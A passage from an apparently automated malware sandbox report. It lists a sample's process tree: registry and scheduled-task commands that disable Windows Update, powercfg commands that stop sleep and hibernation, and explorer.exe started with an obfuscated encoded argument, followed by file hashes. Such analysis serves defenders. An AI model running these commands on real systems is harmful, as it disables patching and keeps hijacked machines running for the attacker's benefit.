- Modifies file permissions
PID:1560 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
PID:1904 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
PID:628 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:1188 -
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
PID:1960 -
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵PID:664
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵PID:1028
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵PID:548
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵PID:1376
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵PID:1476
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵PID:1352
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵PID:1896
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵PID:1976
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1696 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:320 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
PID:900 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "dcpwerxuy"4⤵PID:1616
-
C:\Windows\explorer.exeC:\Windows\explorer.exe spvkjhubdgcazo1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8eKezaNpuSO3umoNE74aPKOBJ7Z4OcaaPQIxzo8B58Gs4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1992
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.3MB
MD5df35dd9a6f211651c51e99928eb21cf1
SHA184b644f6e404c0c6eac3af7768d7d44c01dbd9bb
SHA256b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c
SHA512b6a21f19adc1a302677da6f1c8f7bcc6222b5d2edd4fb12f21c1c12a1d55aa93c8586ce25827f8c9f45d51003b5b2db106949c7791d98d9b474a10a99dcca1d6
-
Filesize
7.3MB
MD5df35dd9a6f211651c51e99928eb21cf1
SHA184b644f6e404c0c6eac3af7768d7d44c01dbd9bb
SHA256b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c
SHA512b6a21f19adc1a302677da6f1c8f7bcc6222b5d2edd4fb12f21c1c12a1d55aa93c8586ce25827f8c9f45d51003b5b2db106949c7791d98d9b474a10a99dcca1d6
-
Filesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
Filesize
7.3MB
MD5df35dd9a6f211651c51e99928eb21cf1
SHA184b644f6e404c0c6eac3af7768d7d44c01dbd9bb
SHA256b36f1aba7155ea371ae7bdaeef70f14c46040ec00a9a7dccad4e607852e13b4c
SHA512b6a21f19adc1a302677da6f1c8f7bcc6222b5d2edd4fb12f21c1c12a1d55aa93c8586ce25827f8c9f45d51003b5b2db106949c7791d98d9b474a10a99dcca1d6